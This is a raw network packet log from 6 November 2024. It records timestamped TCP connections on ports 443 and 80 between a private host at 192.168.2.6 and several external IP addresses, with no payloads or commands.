                                              Nov 6, 2024 17:02:43.992537022 CET56822443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.992557049 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.993170023 CET56823443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.993181944 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.995467901 CET56824443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.995485067 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.996377945 CET56825443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.996407986 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.996463060 CET56825443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.996575117 CET56825443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.996583939 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.997929096 CET56826443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.997951031 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.998013020 CET56826443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.998585939 CET56826443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.998599052 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.188885927 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:44.283797026 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:44.283828020 CET44356827188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:44.285903931 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:44.292504072 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:44.292521954 CET44356827188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:44.333549976 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:44.721087933 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.733800888 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.733921051 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.735366106 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.739598989 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.744342089 CET56822443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.744363070 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.745044947 CET56822443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.745050907 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.745357990 CET56823443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.745392084 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.745708942 CET56825443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.745726109 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.745949984 CET56823443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.745955944 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.746118069 CET56825443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.746123075 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.746352911 CET56826443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.746371031 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.746803045 CET56826443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.746809006 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.765119076 CET56824443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.765130043 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.765558958 CET56824443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.765566111 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.870961905 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.871243954 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.871324062 CET56826443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.871575117 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.871577024 CET56826443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.871596098 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.871617079 CET56826443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.871623993 CET4435682613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.871686935 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.871819973 CET56822443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.872653961 CET56822443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.872673988 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.872674942 CET56822443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.872682095 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.875642061 CET56828443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.875673056 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.875777960 CET56829443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.875818014 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.875821114 CET56828443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.876005888 CET56829443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.876146078 CET56828443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.876159906 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.876451015 CET56829443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.876461983 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.878789902 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.878844976 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.878886938 CET56823443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.879060030 CET56823443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.879070044 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.879085064 CET56823443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.879090071 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.882637978 CET56830443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.882658005 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.882716894 CET56830443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.882962942 CET56830443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.882972002 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.891405106 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.892852068 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.893107891 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.893178940 CET56825443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.893230915 CET56825443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.893239975 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.893251896 CET56825443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.893255949 CET4435682513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.895175934 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.895431995 CET56832443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.895462990 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.895467997 CET56824443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.895525932 CET56832443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.895534992 CET56824443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.895534992 CET56824443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.895551920 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.895565033 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.895687103 CET56832443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.895701885 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.897578001 CET56833443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.897600889 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.897694111 CET56833443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.897855997 CET56833443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:44.897870064 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:44.915579081 CET44356827188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:44.915632963 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:44.918226004 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:44.918234110 CET44356827188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:44.918518066 CET44356827188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:44.991698027 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:44.997354984 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:45.043324947 CET44356827188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:45.146477938 CET44356827188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:45.146563053 CET44356827188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:45.146660089 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:45.154351950 CET56827443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:45.168216944 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:45.174536943 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:45.417886972 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:45.425494909 CET56834443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:45.425565958 CET44356834188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:45.425676107 CET56834443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:45.425966024 CET56834443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:45.425976038 CET44356834188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:45.536539078 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:45.612862110 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.613099098 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.613399982 CET56828443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.613420010 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.613790989 CET56829443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.613837004 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.613925934 CET56828443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.613930941 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.614487886 CET56829443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.614494085 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.629131079 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.629698992 CET56833443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.629718065 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.630202055 CET56833443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.630209923 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.630403996 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.630733013 CET56832443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.630754948 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.631320953 CET56832443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.631328106 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.744184017 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.744260073 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.744314909 CET56828443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.744358063 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.744421959 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.744466066 CET56829443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.752552032 CET56828443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.752573013 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.752583981 CET56828443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.752590895 CET4435682813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.754009008 CET56829443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.754044056 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.754060030 CET56829443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.754070997 CET4435682913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.757370949 CET56835443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.757405996 CET4435683513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.757477045 CET56835443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.757971048 CET56835443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.757982969 CET4435683513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.758341074 CET56836443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.758378983 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.758459091 CET56836443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.758567095 CET56836443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.758577108 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.758909941 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.759319067 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.759412050 CET56833443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.759429932 CET56833443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.759429932 CET56833443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.759440899 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.759448051 CET4435683313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.761723042 CET56837443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.761745930 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.761811018 CET56837443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.761985064 CET56837443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.761996031 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.764756918 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.764817953 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.764934063 CET56832443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.764966965 CET56832443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.764966965 CET56832443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.764978886 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.764990091 CET4435683213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.768033981 CET56838443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.768069983 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.768285990 CET56838443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.768634081 CET56838443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.768654108 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.812522888 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.813050985 CET56830443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.813069105 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.813527107 CET56830443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.813532114 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.941401958 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.941579103 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.941891909 CET56830443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.941924095 CET56830443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.941936016 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.941947937 CET56830443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.941958904 CET4435683013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.944520950 CET56839443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.944545031 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:45.944606066 CET56839443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.944737911 CET56839443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:45.944749117 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.107009888 CET44356834188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:46.134644032 CET56834443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:46.134685040 CET44356834188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:46.299411058 CET44356834188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:46.299520969 CET44356834188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:46.299568892 CET56834443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:46.300065994 CET56834443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:46.306965113 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:46.308110952 CET5684180192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:46.312840939 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:46.313016891 CET8056841193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:46.313066006 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:46.313096046 CET5684180192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:46.313200951 CET5684180192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:46.317982912 CET8056841193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:46.870966911 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.871431112 CET56836443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.871457100 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.872118950 CET56836443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.872123003 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.873171091 CET4435683513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.873652935 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.873951912 CET56835443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.873975039 CET4435683513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.874424934 CET56835443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.874429941 CET4435683513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.876316071 CET56838443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.876338959 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.876696110 CET56838443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.876699924 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.879797935 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.880141973 CET56837443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.880157948 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.880187035 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.880729914 CET56839443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.880743980 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.880799055 CET56837443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.880804062 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.881222963 CET56839443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.881230116 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.927608967 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:46.932863951 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:46.932974100 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:46.933151960 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:46.938247919 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:46.999613047 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.999671936 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.999870062 CET56836443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.999907970 CET56836443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.999926090 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:46.999938965 CET56836443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:46.999943972 CET4435683613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.002479076 CET56844443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.002521038 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.002588034 CET56844443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.002708912 CET56844443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.002722979 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.003277063 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.003407955 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.003468037 CET56838443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.003492117 CET56838443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.003503084 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.003514051 CET56838443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.003516912 CET4435683813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.005474091 CET56845443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.005503893 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.005567074 CET56845443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.005683899 CET56845443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.005693913 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.010313988 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.010445118 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.010508060 CET56839443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.010539055 CET56839443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.010539055 CET56839443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.010555983 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.010564089 CET4435683913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.012346983 CET4435683513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.012617111 CET56846443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.012629032 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.012696028 CET56846443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.012799978 CET56846443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.012810946 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.013025045 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.013086081 CET4435683513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.013221025 CET56835443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.013221025 CET56835443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.013272047 CET56835443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.013288975 CET4435683513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.013561964 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.013879061 CET56837443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.013905048 CET56837443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.013910055 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.013917923 CET56837443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.013922930 CET4435683713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.015332937 CET56847443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.015355110 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.015444040 CET56847443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.015547037 CET56847443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.015556097 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.015691042 CET56848443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.015737057 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.015793085 CET56848443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.015913963 CET56848443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.015940905 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.142118931 CET8056841193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:47.143615961 CET56849443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:47.143631935 CET44356849188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:47.143728018 CET56849443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:47.144133091 CET56849443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:47.144143105 CET44356849188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:47.224067926 CET5684180192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:47.733419895 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.733875990 CET56846443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.733911991 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.734335899 CET56846443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.734339952 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.741933107 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.743027925 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.743390083 CET56844443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.743396044 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.743798018 CET56844443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.743802071 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.744003057 CET56848443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.744040012 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.744381905 CET56848443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.744389057 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.745594978 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.745640993 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.745937109 CET56845443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.745961905 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.746051073 CET56847443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.746058941 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.746387959 CET56845443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.746392965 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.746473074 CET56847443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.746476889 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.762403965 CET44356849188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:47.764683008 CET56849443192.168.2.6188.114.96.3
